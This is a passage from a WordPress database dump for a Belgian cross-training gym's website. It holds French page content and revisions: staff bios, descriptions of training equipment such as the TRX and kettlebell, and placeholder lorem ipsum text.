src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>LesMills Coach</li>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'publish', 'closed', 'open', '', 'lequipe', '', '', '2015-04-21 09:46:39', '2015-04-21 09:46:39', '', 0, 'http://www.crosstrainingcenter.be/?page_id=20', 0, 'page', '', 0),
(479, 1, '2015-04-21 09:39:41', '2015-04-21 09:39:41', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoach\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n        <li>Formation Personal Trainer (Parnasse)</li>\r\n	<li>Formation Les mills Coach BodyBoxe</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>LesMills Coach</li>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2015-04-21 09:39:41', '2015-04-21 09:39:41', '', 20, 'http://www.crosstrainingcenter.be/20-revision-v1/', 0, 'revision', '', 0),
(21, 1, '2013-05-24 14:33:45', '2013-05-24 14:33:45', '', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-05-24 14:33:45', '2013-05-24 14:33:45', '', 20, 'http://www.crosstrainingcenter.be/?p=21', 0, 'revision', '', 0),
(22, 1, '2013-05-24 14:34:07', '2013-05-24 14:34:07', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …).\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebell</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-72\" alt=\"vipr-f1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-75\" alt=\"ript\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'publish', 'closed', 'open', '', 'le-cross-training', '', '', '2013-11-04 17:38:54', '2013-11-04 17:38:54', '', 0, 'http://www.crosstrainingcenter.be/?page_id=22', 0, 'page', '', 0),
(23, 1, '2013-05-24 14:34:02', '2013-05-24 14:34:02', '', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-05-24 14:34:02', '2013-05-24 14:34:02', '', 22, 'http://www.crosstrainingcenter.be/?p=23', 0, 'revision', '', 0),
(24, 1, '2013-05-24 14:34:58', '2013-05-24 14:34:58', ' ', '', '', 'publish', 'open', 'open', '', '24', '', '', '2015-04-21 08:50:04', '2015-04-21 08:50:04', '', 0, 'http://www.crosstrainingcenter.be/?p=24', 2, 'nav_menu_item', '', 0),
(25, 1, '2013-05-24 14:34:58', '2013-05-24 14:34:58', '', 'L\'équipe', '', 'publish', 'open', 'open', '', 'lequipe', '', '', '2015-04-21 08:50:04', '2015-04-21 08:50:04', '', 0, 'http://www.crosstrainingcenter.be/?p=25', 6, 'nav_menu_item', '', 0),
(26, 1, '2013-05-23 19:28:51', '2013-05-23 19:28:51', '<h1>Prise de RDV :</h1>\r\nblablabla', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-05-23 19:28:51', '2013-05-23 19:28:51', '', 9, 'http://www.crosstrainingcenter.be/?p=26', 0, 'revision', '', 0),
(27, 1, '2013-05-24 14:33:49', '2013-05-24 14:33:49', 'blabla', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-05-24 14:33:49', '2013-05-24 14:33:49', '', 20, 'http://www.crosstrainingcenter.be/?p=27', 0, 'revision', '', 0),
(28, 1, '2013-05-24 14:34:07', '2013-05-24 14:34:07', 'définition, historique', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-05-24 14:34:07', '2013-05-24 14:34:07', '', 22, 'http://www.crosstrainingcenter.be/?p=28', 0, 'revision', '', 0),
(29, 1, '2013-05-23 19:28:51', '2013-05-23 19:28:51', '<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i><i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i><i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i><i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-05-23 19:28:51', '2013-05-23 19:28:51', '', 11, 'http://www.crosstrainingcenter.be/?p=29', 0, 'revision', '', 0),
(30, 1, '2013-05-23 19:28:51', '2013-05-23 19:28:51', '<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>\r\n\r\n<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>\r\n\r\n<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-05-23 19:28:51', '2013-05-23 19:28:51', '', 5, 'http://www.crosstrainingcenter.be/?p=30', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(32, 1, '2013-07-10 16:11:47', '2013-07-10 16:11:47', '<blockquote>\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\n</blockquote>\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …).\n<h2></h2>\n&nbsp;\n<div class=\"arrondi\">\n<table style=\"border: 1px; width: 100%;\">\n<tbody>\n<tr>\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></td>\n<td style=\"border: 0px; padding: 5px;\">\n<h1>TRX Suspension Training</h1>\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\n</tr>\n</tbody>\n</table>\n</div>\n&nbsp;\n<div class=\"arrondi\">\n<table style=\"border: 1px; width: 100%;\">\n<tbody>\n<tr>\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></td>\n<td style=\"border: 0px; padding: 5px;\">\n<h1>Kettlebell</h1>\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\n</tr>\n</tbody>\n</table>\n</div>\n&nbsp;\n<div class=\"arrondi\">\n<table style=\"border: 1px; width: 100%;\">\n<tbody>\n<tr>\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-72\" alt=\"vipr-f1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\" width=\"200\" height=\"200\" /></td>\n<td style=\"border: 0px; padding: 5px;\">\n<h1>ViPR</h1>\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\n</tr>\n</tbody>\n</table>\n</div>\n&nbsp;\n<div class=\"arrondi\">\n<table style=\"border: 1px; width: 100%;\">\n<tbody>\n<tr>\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-75\" alt=\"ript\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\" width=\"200\" height=\"200\" /></td>\n<td style=\"border: 0px; padding: 5px;\">\n<h1>RIP Trainer</h1>\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\n</tr>\n</tbody>\n</table>\n</div>\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-autosave-v1', '', '', '2013-07-10 16:11:47', '2013-07-10 16:11:47', '', 22, 'http://www.crosstrainingcenter.be/?p=32', 0, 'revision', '', 0),
(31, 1, '2013-05-24 14:36:30', '2013-05-24 14:36:30', '<h1>Prise de RDV :</h1>\r\nblablabla', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-05-24 14:36:30', '2013-05-24 14:36:30', '', 9, 'http://www.crosstrainingcenter.be/?p=31', 0, 'revision', '', 0),
(40, 1, '2013-06-16 08:02:41', '2013-06-16 08:02:41', '« Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines. Afin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2><b>TRX Suspension Training </b></h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2><b>Kettlebel</b></h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre 